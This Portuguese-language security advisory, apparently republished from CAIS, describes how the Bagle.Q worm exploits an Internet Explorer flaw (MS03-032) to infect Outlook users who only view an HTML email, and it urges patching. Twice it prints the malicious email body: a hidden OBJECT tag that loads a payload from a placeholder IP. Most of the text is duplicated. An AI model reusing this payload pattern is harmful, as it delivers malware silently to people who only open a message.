Total Security - totalsecurity.com.br
Vírus Bagle.Q explora vulnerabilidade do IE
A variante Q do vírus Bagle explora uma vulnerabilidade identificada no Internet Explorer que permite ao worm infectar o sistema sem a intervenção do usuário e sem a presença do executavel anexado na mensagem. O Microsoft Outlook é vulnerável a este Worm pois utiliza o Internet Explorer para visualisar mensagens HTML.
A infecção do sistema ocorre em duas etapas:
Um mensagem é recebida com o seguinte conteúdo:
<html><body>
<font face=System>
<OBJECT STYLE=display:none DATA=http://<IP address>:81/373273.php>
</OBJECT></body></html>
A leitura da mensagem com um dos aplicativos de email vulneraveis (Microsft Outlook e Microsoft Outllok Express), permite que o vírus/worm seja carregado atraves de uma conexao http com o IP especificado no corpo da mensagem.
Sistemas infectados pelo worm passarão a enviar mensagens para os
endereços de email encontrados na maquina vítima.
A vulnerabilidade explorada pelo Worm foi descrita nos seguintes alertas:
- Patch Acumulativo para o Internet Explorer (822925)
- Microsoft Security Bulletin MS03-032
Em virtude da exploração da vulnerabilidade e da potencial propagação do Worm, é recomendado que sejam aplicadas as correções necessárias com urgência, conforme descrito nos alertas citados acima.
Fonte: CAIS
A infecção do sistema ocorre em duas etapas:
Um mensagem é recebida com o seguinte conteúdo:
<html><body>
<font face=System>
<OBJECT STYLE=display:none DATA=http://<IP address>:81/373273.php>
</OBJECT></body></html>
A leitura da mensagem com um dos aplicativos de email vulneraveis (Microsft Outlook e Microsoft Outllok Express), permite que o vírus/worm seja carregado atraves de uma conexao http com o IP especificado no corpo da mensagem.
Sistemas infectados pelo worm passarão a enviar mensagens para os
endereços de email encontrados na maquina vítima.
A vulnerabilidade explorada pelo Worm foi descrita nos seguintes alertas:
- Patch Acumulativo para o Internet Explorer (822925)
- Microsoft Security Bulletin MS03-032
Em virtude da exploração da vulnerabilidade e da potencial propagação do Worm, é recomendado que sejam aplicadas as correções necessárias com urgência, conforme descrito nos alertas citados acima.
Fonte: CAIS
URL Fonte: https://totalsecurity.com.br/noticia/633/visualizar/
Comentários